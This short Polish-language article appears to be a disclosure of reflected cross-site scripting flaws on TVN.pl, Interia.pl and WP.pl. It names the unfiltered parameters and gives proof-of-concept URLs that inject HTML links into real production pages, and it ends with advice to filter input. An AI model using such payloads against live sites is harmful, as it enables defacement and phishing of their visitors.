Błędy na stronach TVN, Interia oraz WP

Na stronach TVN.pl, Interia.pl oraz WP.pl występują błędy, dzięki którym możemy wywołać dowolny kod HTML bądź też kod napisany w JavaScript.

Błąd na stronach TVN.pl dostępny jest poprzez wykorzystanie nie filtrowanej zmiennej "q=" wywoływanej przez serwisową wyszukiwarkę. Przykład wykorzystania błędu tego typu wygląda następująco:

http://tvn.pl/szukaj.html?q=KOD

gdzie w miejsce KOD wpisujemy tekst, bądź kod w postaci czystego HTML lub JavaScript.

Przykłady:
http://tvn.pl/szukaj.html?q=http://hacking.pl
http://tvn.pl/szukaj.html?q=<a href="http://hacking.pl">hacking.pl</a>

Serwis Interia.pl również posiada te same błędy. Przykładem może być tutaj serwis fakty.interia.pl gdzie możemy odwołać się do zmiennej "szukaj=":

http://fakty.interia.pl/szukaj?szukaj=KOD

Przykład:
http://fakty.interia.pl/szukaj?szukaj=hacking.pl

Natomiast w przypadku WP.pl ten sam błąd dostępny jest na stronie tv.wp.pl gdzie wystarczy wpisać swój kod w zmienną "katn="

http://tv.wp.pl/index.html?katn=KOD

Przykład:
http://tv.wp.pl/index.html?katn=<h1><a href="http://hacking.pl">hacking.pl</a></h1>

oraz stronie pogoda.wp.pl gdzie również wpisujemy dowolny kod ale tym razem w zmienną "date="

http://pogoda.wp.pl/woj.html?POD=1&wid=MAZ&date=KOD

Przykład:
http://pogoda.wp.pl/woj.html?POD=1&wid=MAZ&date=<h1><a href="http://hacking.pl">hacking.pl</a></h1>

Błędy dostępne są również w pozostałych serwisach WP.pl.

Ostatecznie podsumowując błędy typu Cross-Site Scripting (XSS) znajdują się w prawie każdym serwisie internetowym, co stanowi dość poważny problem i otwierają nowe możliwości internetowym oszustom. Jedynym sposobem na zabezpieczenie się przed tego typu atakami jest zwrócenie większej uwagi na pisanie bezpieczniejszego kodu oraz filtrowanie każdej zmiennej, w której przekazywany jest zewnętrznie argument.